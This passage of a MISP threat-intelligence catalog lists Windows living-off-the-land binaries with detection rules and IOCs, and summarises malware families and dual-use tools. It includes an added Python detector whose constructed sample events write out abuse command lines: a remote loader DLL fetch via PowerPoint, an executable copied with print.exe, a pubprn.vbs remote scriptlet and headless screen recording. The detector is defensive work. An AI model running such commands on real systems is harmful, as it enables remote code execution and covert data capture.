<sup>[[Presentationhost.exe - LOLBAS Project](/references/37539e72-18f5-435a-a949-f9fa5991149a)]</sup>

The tag is: misp-galaxy:software="Presentationhost.exe - Associated Software"

Presentationhost

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: File is used for executing Browser applications

Author: Oddvar Moe

Paths: * C:\Windows\System32\Presentationhost.exe * C:\Windows\SysWOW64\Presentationhost.exe

Detection: * Sigma: [proc_creation_win_lolbin_presentationhost_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml) * Sigma: [proc_creation_win_lolbin_presentationhost.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml) * IOC: Execution of .xbap files may not be common on production workstations<sup>[[Presentationhost.exe - LOLBAS Project](/references/37539e72-18f5-435a-a949-f9fa5991149a)]</sup>

The tag is: misp-galaxy:software="Presentationhost"

Prestige

[Prestige](https://app.tidalcyber.com/software/4fb5b109-5a5c-5441-a0f9-f639ead5405e) ransomware has been used by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.<sup>[[Microsoft Prestige ransomware October 2022](https://app.tidalcyber.com/references/b57e1181-461b-5ada-a739-873ede1ec079)]</sup>

The tag is: misp-galaxy:software="Prestige"

Prikormka

[Prikormka](https://app.tidalcyber.com/software/1da989a8-41cc-4e89-a435-a88acb72ae0d) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. <sup>[[ESET Operation Groundbait](https://app.tidalcyber.com/references/218e69fd-558c-459b-9a57-ad2ee3e96296)]</sup>

The tag is: misp-galaxy:software="Prikormka"

Print.exe - Associated Software

<sup>[[Print.exe - LOLBAS Project](/references/696ce89a-b3a1-4993-b30d-33a669a57031)]</sup>

The tag is: misp-galaxy:software="Print.exe - Associated Software"

Print

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to send files to the printer

Author: Oddvar Moe

Paths: * C:\Windows\System32\print.exe * C:\Windows\SysWOW64\print.exe

Detection: * Sigma: [proc_creation_win_print_remote_file_copy.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml) * IOC: Print.exe retrieving files from internet * IOC: Print.exe creating executable files on disk<sup>[[Print.exe - LOLBAS Project](/references/696ce89a-b3a1-4993-b30d-33a669a57031)]</sup>

The tag is: misp-galaxy:software="Print"

PrintBrm.exe - Associated Software

<sup>[[PrintBrm.exe - LOLBAS Project](/references/a7ab6f09-c22f-4627-afb1-c13a963efca5)]</sup>

The tag is: misp-galaxy:software="PrintBrm.exe - Associated Software"

PrintBrm

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Printer Migration Command-Line Tool

Author: Elliot Killick

Paths: * C:\Windows\System32\spool\tools\PrintBrm.exe

Detection: * Sigma: [proc_creation_win_lolbin_printbrm.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml) * IOC: PrintBrm.exe should not be run on a normal workstation<sup>[[PrintBrm.exe - LOLBAS Project](/references/a7ab6f09-c22f-4627-afb1-c13a963efca5)]</sup>

The tag is: misp-galaxy:software="PrintBrm"

Microsoft Sysinternals ProcDump - Associated Software

The tag is: misp-galaxy:software="Microsoft Sysinternals ProcDump - Associated Software"

ProcDump

ProcDump is a Sysinternals command-line tool used to monitor applications for CPU spikes and generate crash dumps; because it can dump the memory of any process, intruders commonly abuse it to dump LSASS for credential theft.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="ProcDump"

Process Hacker

Process Hacker is an open-source process viewer and system monitor; the cited CISA advisory lists it as a tool used to remove rootkits, and the same process-termination capability lets an intruder kill security agents before deploying ransomware.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Process Hacker"

ProLock

[ProLock](https://app.tidalcyber.com/software/c8af096e-c71e-4751-b203-70c285b7a7bd) is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with [QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea). [ProLock](https://app.tidalcyber.com/software/c8af096e-c71e-4751-b203-70c285b7a7bd) is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.<sup>[[Group IB Ransomware September 2020](https://app.tidalcyber.com/references/52d0e16f-9a20-442f-9a17-686e51d7e32b)]</sup>

The tag is: misp-galaxy:software="ProLock"

ProtocolHandler.exe - Associated Software

<sup>[[ProtocolHandler.exe - LOLBAS Project](/references/1f678111-dfa3-4c06-9359-816b9ca12cd0)]</sup>

The tag is: misp-galaxy:software="ProtocolHandler.exe - Associated Software"

ProtocolHandler

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Office binary

Author: Nir Chako

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe * C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe * C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe

Resources: None Provided

Detection: * Sigma: [proc_creation_win_lolbin_protocolhandler_download.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml) * IOC: Suspicious Office application Internet/network traffic<sup>[[ProtocolHandler.exe - LOLBAS Project](/references/1f678111-dfa3-4c06-9359-816b9ca12cd0)]</sup>

The tag is: misp-galaxy:software="ProtocolHandler"

Proton

[Proton](https://app.tidalcyber.com/software/d3bcdbc4-5998-4e50-bd45-cba6a3278427) is a macOS backdoor focusing on data theft and credential access <sup>[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup>.

The tag is: misp-galaxy:software="Proton"

Provlaunch.exe - Associated Software

<sup>[[Provlaunch.exe - LOLBAS Project](/references/56a57369-4707-4dff-ad23-431109f24233)]</sup>

The tag is: misp-galaxy:software="Provlaunch.exe - Associated Software"

Provlaunch

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Launcher process

Author: Grzegorz Tworek

Paths: * c:\windows\system32\provlaunch.exe

Detection: * Sigma: [proc_creation_win_provlaunch_potential_abuse.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml) * Sigma: [proc_creation_win_provlaunch_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml) * Sigma: [proc_creation_win_registry_provlaunch_provisioning_command.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml) * Sigma: [registry_set_provisioning_command_abuse.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml) * IOC: c:\windows\system32\provlaunch.exe executions * IOC: Creation/existence of HKLM\SOFTWARE\Microsoft\Provisioning\Commands subkeys<sup>[[Provlaunch.exe - LOLBAS Project](/references/56a57369-4707-4dff-ad23-431109f24233)]</sup>

The tag is: misp-galaxy:software="Provlaunch"

Proxysvc

[Proxysvc](https://app.tidalcyber.com/software/94f43629-243e-49dc-8c2b-cdf4fc15cf83) is a malicious DLL used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://app.tidalcyber.com/software/94f43629-243e-49dc-8c2b-cdf4fc15cf83) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. <sup>[[McAfee GhostSecret](https://app.tidalcyber.com/references/d1cd4f5b-253c-4833-8905-49fb58e7c016)]</sup>

The tag is: misp-galaxy:software="Proxysvc"

PS1

[PS1](https://app.tidalcyber.com/software/8cd401ac-a233-4395-a8ae-d75db9d5b845) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://app.tidalcyber.com/groups/) campaign.<sup>[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]</sup>

The tag is: misp-galaxy:software="PS1"

PsExec

[PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.<sup>[[Russinovich Sysinternals](https://app.tidalcyber.com/references/72d27aca-62c5-4e96-9977-c41951aaa888)]</sup><sup>[[SANS PsExec](https://app.tidalcyber.com/references/a8d1e40d-b291-443c-86cc-edf6db00b898)]</sup>

The tag is: misp-galaxy:software="PsExec"

Psr.exe - Associated Software

<sup>[[Psr.exe - LOLBAS Project](/references/a00782cf-f6b2-4b63-9d8d-97efe17e11c0)]</sup>

The tag is: misp-galaxy:software="Psr.exe - Associated Software"

Psr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Problem Steps Recorder, used to record screen and clicks.

Author: Leon Rodenko

Paths: * c:\windows\system32\psr.exe * c:\windows\syswow64\psr.exe

Detection: * Sigma: [proc_creation_win_psr_capture_screenshots.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml) * IOC: psr.exe spawned * IOC: suspicious activity when running with "/gui 0" flag<sup>[[Psr.exe - LOLBAS Project](/references/a00782cf-f6b2-4b63-9d8d-97efe17e11c0)]</sup>

The tag is: misp-galaxy:software="Psr"

Psylo

The tag is: misp-galaxy:software="Psylo"

Pterodo - Associated Software

The tag is: misp-galaxy:software="Pterodo - Associated Software"

Pteranodon

The tag is: misp-galaxy:software="Pteranodon"

Pubprn.vbs - Associated Software

<sup>[[Pubprn.vbs - LOLBAS Project](/references/d2b6b9fd-5f80-41c0-ac22-06b78c86a9e5)]</sup>

The tag is: misp-galaxy:software="Pubprn.vbs - Associated Software"

Pubprn

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Proxy execution with Pubprn.vbs

Author: Oddvar Moe

Paths: * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs

The tag is: misp-galaxy:software="Pubprn"
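The LOLBAS entries above (Powerpnt, ProtocolHandler, Presentationhost, Print, PrintBrm, Provlaunch, Psr and Pubprn) each list IOCs but leave it to the reader to turn them into checks. The following is an added example, not code from the MISP galaxy, the LOLBAS project or SigmaHQ: a small rule set that encodes those IOCs and runs them over constructed Sysmon-style events (EventID 1 = process creation, EventID 12/13 = registry key/value change). The field names Image, CommandLine, TargetObject, RecordId and IsServer, and every command line in the sample events, are assumptions made for the example.

```python
"""Added example: toy detector for the LOLBAS IOCs listed on this page.

Sample events are constructed (not real telemetry) in a Sysmon-like shape.
Field names are assumptions: Image, CommandLine, TargetObject, RecordId,
IsServer (True when the host is a print server, where PrintBrm is expected).
"""
import ntpath
import re

OFFICE_BINS = {"powerpnt.exe", "protocolhandler.exe"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
EXEC_EXT = (".exe", ".dll", ".scr")
PROVISIONING_KEY = "hklm\\software\\microsoft\\provisioning\\commands\\"


def is_remote(arg: str) -> bool:
    """True for http(s) URLs and UNC/WebDAV paths (\\\\host\\share, \\\\host@80\\...)."""
    return arg.startswith(("http://", "https://", "\\\\"))


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def check_process(ev: dict) -> list:
    """Return the names of every rule matching one process-creation event."""
    hits = []
    img = image_name(ev["Image"])
    cmd_l = ev.get("CommandLine", "").lower()
    # Crude whitespace tokenizer: a quoted image path with spaces is split into
    # junk tokens, but the checks below only look at URL-like or /switch tokens.
    args = cmd_l.split()[1:]
    # Powerpnt / ProtocolHandler: Office binary handed a URL or UNC path.
    if img in OFFICE_BINS and any(is_remote(a) for a in args):
        hits.append("office_binary_remote_argument")
    # Presentationhost: running a .xbap (XAML browser application), local or remote.
    if img == "presentationhost.exe" and any(a.endswith(".xbap") for a in args):
        hits.append("presentationhost_xbap")
    # Print.exe: /D: redirects the "print" to a file. Flag a remote source or an
    # executable destination; a normal print job to \\server\printer stays quiet.
    if img == "print.exe":
        dest = next((a[3:] for a in args if a.startswith("/d:")), "")
        src = args[-1] if args else ""
        if is_remote(src) or dest.endswith(EXEC_EXT):
            hits.append("print_exe_file_copy")
    # PrintBrm: the printer migration tool has no business on a workstation.
    if img == "printbrm.exe" and not ev.get("IsServer", False):
        hits.append("printbrm_on_workstation")
    # Provlaunch: any execution is rare outside device provisioning.
    if img == "provlaunch.exe":
        hits.append("provlaunch_execution")
    # Psr: Problem Steps Recorder capturing the screen without a GUI.
    if img == "psr.exe" and re.search(r"/gui\s+0\b", cmd_l):
        hits.append("psr_headless_recording")
    # Pubprn.vbs: a script: moniker argument means remote scriptlet execution.
    if img in SCRIPT_HOSTS and "pubprn.vbs" in cmd_l and any(a.startswith("script:") for a in args):
        hits.append("pubprn_script_moniker")
    return hits


def check_registry(ev: dict) -> list:
    """Flag writes under the Provisioning\\Commands key that provlaunch.exe consumes."""
    target = ev["TargetObject"].lower()
    return ["provisioning_commands_key"] if target.startswith(PROVISIONING_KEY) else []


def scan(events) -> list:
    """Return (RecordId, rule) pairs for every event that matches a rule."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 1:
            hits = check_process(ev)
        elif ev["EventID"] in (12, 13):
            hits = check_registry(ev)
        else:
            hits = []
        alerts.extend((ev["RecordId"], h) for h in hits)
    return alerts


# Constructed sample events (not real telemetry): one abuse shape per binary
# plus two benign look-alikes (records 2 and 5) that must not alert.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1, "Image": r"C:\Program Files\Microsoft Office\Office16\Powerpnt.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office16\Powerpnt.exe" https://example.invalid/loader.dll'},
    {"RecordId": 2, "EventID": 1, "Image": r"C:\Program Files\Microsoft Office\Office16\Powerpnt.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office16\Powerpnt.exe" C:\Users\alice\Q3.pptx'},
    {"RecordId": 3, "EventID": 1, "Image": r"C:\Windows\System32\Presentationhost.exe",
     "CommandLine": r"presentationhost.exe C:\Users\Public\app.xbap"},
    {"RecordId": 4, "EventID": 1, "Image": r"C:\Windows\System32\print.exe",
     "CommandLine": r"print.exe /D:C:\Users\Public\svc.exe \\10.0.0.5\share\svc.exe"},
    {"RecordId": 5, "EventID": 1, "Image": r"C:\Windows\System32\print.exe",
     "CommandLine": r"print.exe /D:\\printsrv\HP01 C:\docs\report.txt"},
    {"RecordId": 6, "EventID": 1, "Image": r"C:\Windows\System32\spool\tools\PrintBrm.exe",
     "CommandLine": r"PrintBrm.exe -r -f C:\Users\Public\in.zip -d C:\Users\Public\out", "IsServer": False},
    {"RecordId": 7, "EventID": 1, "Image": r"C:\Windows\System32\provlaunch.exe",
     "CommandLine": r"provlaunch.exe Example"},
    {"RecordId": 8, "EventID": 12, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Provisioning\Commands\Example\Run"},
    {"RecordId": 9, "EventID": 1, "Image": r"C:\Windows\System32\psr.exe",
     "CommandLine": r"psr.exe /start /output C:\Users\Public\rec.zip /sc 1 /gui 0"},
    {"RecordId": 10, "EventID": 1, "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://example.invalid/x.sct"},
]

if __name__ == "__main__":
    for record_id, rule in scan(SAMPLE_EVENTS):
        print(record_id, rule)
```

The rules are deliberately narrow so that ordinary use of the same binaries (opening a local .pptx, printing to a network printer) does not fire; the Sigma rules cited in each entry cover more variants and should be preferred in production, with this script serving only to show how each listed IOC maps to a concrete field check.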

Pulseway

According to joint Cybersecurity Advisory AA23-320A (November 2023), Pulseway is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:software="Pulseway"

ShellTea - Associated Software

The tag is: misp-galaxy:software="ShellTea - Associated Software"

PUNCHBUGGY

[PUNCHBUGGY](https://app.tidalcyber.com/software/d8999d60-3818-4d75-8756-8a55531254d8) is a backdoor malware used by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) that has been observed targeting POS networks in the hospitality industry. <sup>[[Morphisec ShellTea June 2019](https://app.tidalcyber.com/references/1b6ce918-651a-480d-8305-82bccbf42e96)]</sup><sup>[[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)]</sup> <sup>[[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]</sup>

The tag is: misp-galaxy:software="PUNCHBUGGY"

PSVC - Associated Software

<sup>[[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]</sup>

The tag is: misp-galaxy:software="PSVC - Associated Software"

PUNCHTRACK

[PUNCHTRACK](https://app.tidalcyber.com/software/1638d99b-fbcf-40ec-ac48-802ce5be520a) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) to scrape payment card data. <sup>[[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)]</sup> <sup>[[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]</sup>

The tag is: misp-galaxy:software="PUNCHTRACK"

Pupy

[Pupy](https://app.tidalcyber.com/software/0a8bedc2-b404-4a9a-b4f5-ff90ff8294be) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. <sup>[[GitHub Pupy](https://app.tidalcyber.com/references/69d5cb59-6545-4405-8ca6-733db99d3ee9)]</sup> It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). <sup>[[GitHub Pupy](https://app.tidalcyber.com/references/69d5cb59-6545-4405-8ca6-733db99d3ee9)]</sup> [Pupy](https://app.tidalcyber.com/software/0a8bedc2-b404-4a9a-b4f5-ff90ff8294be) is publicly available on GitHub. <sup>[[GitHub Pupy](https://app.tidalcyber.com/references/69d5cb59-6545-4405-8ca6-733db99d3ee9)]</sup>

The tag is: misp-galaxy:software="Pupy"

PuTTy

PuTTY is an open-source SSH and Telnet client.<sup>[[PuTTY Download Page](/references/bf278270-128e-483b-9f09-ce24f5f6ed80)]</sup>

The tag is: misp-galaxy:software="PuTTy"

pwdump

The tag is: misp-galaxy:software="pwdump"

PyDCrypt

[PyDCrypt](https://app.tidalcyber.com/software/51b2c56e-7d64-4e15-b1bd-45a980c9c44d) is malware written in Python designed to deliver [DCSrv](https://app.tidalcyber.com/software/26ae3cd1-6710-4807-b674-957bd67d3e76). It has been used by [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) since at least September 2021, with each sample tailored for its intended victim organization.<sup>[[Checkpoint MosesStaff Nov 2021](https://app.tidalcyber.com/references/d6da2849-cff0-408a-9f09-81a33fc88a56)]</sup>

The tag is: misp-galaxy:software="PyDCrypt"

Mespinoza - Associated Software

The tag is: misp-galaxy:software="Mespinoza - Associated Software"

Pysa

[Pysa](https://app.tidalcyber.com/software/e0d5ecce-eca0-4f01-afcc-0c8e92323016) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.<sup>[[CERT-FR PYSA April 2020](https://app.tidalcyber.com/references/4e502db6-2e09-4422-9dcc-1e10e701e122)]</sup>

The tag is: misp-galaxy:software="Pysa"

Pinkslipbot - Associated Software

The tag is: misp-galaxy:software="Pinkslipbot - Associated Software"

QBot - Associated Software

The tag is: misp-galaxy:software="QBot - Associated Software"

QuackBot - Associated Software

<sup>[[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)]</sup>

The tag is: misp-galaxy:software="QuackBot - Associated Software"

QakBot

[QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. [QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably [ProLock](https://app.tidalcyber.com/software/c8af096e-c71e-4751-b203-70c285b7a7bd) and Egregor.<sup>[[Trend Micro Qakbot December 2020](https://app.tidalcyber.com/references/c061ce45-1452-4c11-9586-bd5eb2d718ab)]</sup><sup>[[Red Canary Qbot](https://app.tidalcyber.com/references/6e4960e7-ae5e-4b68-ac85-4bd84e940634)]</sup><sup>[[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)]</sup><sup>[[ATT QakBot April 2021](https://app.tidalcyber.com/references/c7b0b3f3-e9ea-4159-acd1-f6d92ed41828)]</sup>

The tag is: misp-galaxy:software="QakBot"

QUADAGENT

The tag is: misp-galaxy:software="QUADAGENT"

xRAT - Associated Software

The tag is: misp-galaxy:software="xRAT - Associated Software"

QuasarRAT

[QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b) is developed in the C# language.<sup>[[GitHub QuasarRAT](https://app.tidalcyber.com/references/c87e4427-af97-4e93-9596-ad5a588aa171)]</sup><sup>[[Volexity Patchwork June 2018](https://app.tidalcyber.com/references/d3ed7dd9-0941-4160-aa6a-c0244c63560f)]</sup>

The tag is: misp-galaxy:software="QuasarRAT"

Tunnus - Associated Software

<sup>[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]</sup>

The tag is: misp-galaxy:software="Tunnus - Associated Software"

QUIETCANARY

[QUIETCANARY](https://app.tidalcyber.com/software/52d3515c-5184-5257-bf24-56adccb4cccd) is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.<sup>[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]</sup>

The tag is: misp-galaxy:software="QUIETCANARY"

QUIETEXIT

[QUIETEXIT](https://app.tidalcyber.com/software/947ab087-7550-577f-9ae9-5e82e9910610) is a novel backdoor, based on the open-source Dropbear SSH client-server software, that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2021. [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) has deployed [QUIETEXIT](https://app.tidalcyber.com/software/947ab087-7550-577f-9ae9-5e82e9910610) on opaque network appliances that typically don’t support antivirus or endpoint detection and response tools within a victim environment.<sup>[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]</sup>

The tag is: misp-galaxy:software="QUIETEXIT"

QuietSieve

[QuietSieve](https://app.tidalcyber.com/software/dcdb74c5-4445-49bd-9f9c-236a7ecc7904) is an information stealer that has been used by [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) since at least 2021.<sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

The tag is: misp-galaxy:software="QuietSieve"

Quser.exe - Associated Software

The tag is: misp-galaxy:software="Quser.exe - Associated Software"

Quser

According to joint Cybersecurity Advisory AA23-250A (September 2023), Quser is "a valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server".<sup>[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]</sup>

The tag is: misp-galaxy:software="Quser"

Raccoon Stealer 2.0

Raccoon Stealer is one of the most heavily used information & credential stealers ("infostealers") in recent years. The "2.0" version of Raccoon Stealer was observed in mid-2022, featuring new capabilities designed to improve its stealth.<sup>[[Sekoia.io Raccoon Stealer June 28 2022](/references/df0c9cbd-8692-497e-9f81-cf9e44a3a5cd)]</sup> Raccoon Stealer is licensed as a service, and like many other modern infostealer families, the relatively low cost of a Raccoon Stealer subscription (around $75 for weeklong access) contributes to the malware’s popularity. Victim credentials acquired via Raccoon Stealer are often resold on illicit, automated marketplaces on the dark web.

More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).

The tag is: misp-galaxy:software="Raccoon Stealer 2.0"

Ragnar Locker

[Ragnar Locker](https://app.tidalcyber.com/software/d25f7acd-a995-4b8b-8ffe-ccc9703cdf5f) is a ransomware that has been in use since at least December 2019.<sup>[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]</sup><sup>[[Cynet Ragnar Apr 2020](https://app.tidalcyber.com/references/aeb637ea-0b83-42a0-8f68-9fdc59aa462a)]</sup>

The tag is: misp-galaxy:software="Ragnar Locker"

Raindrop

[Raindrop](https://app.tidalcyber.com/software/80295aeb-59e3-4c5d-ac39-9879158f8d23) is a loader used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a). It was discovered in January 2021 and was likely used since at least May 2020.<sup>[[Symantec RAINDROP January 2021](https://app.tidalcyber.com/references/9185092d-3d99-466d-b885-f4e76fe74b6b)]</sup><sup>[[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]</sup>

The tag is: misp-galaxy:software="Raindrop"

RainyDay

The tag is: misp-galaxy:software="RainyDay"

Ramsay

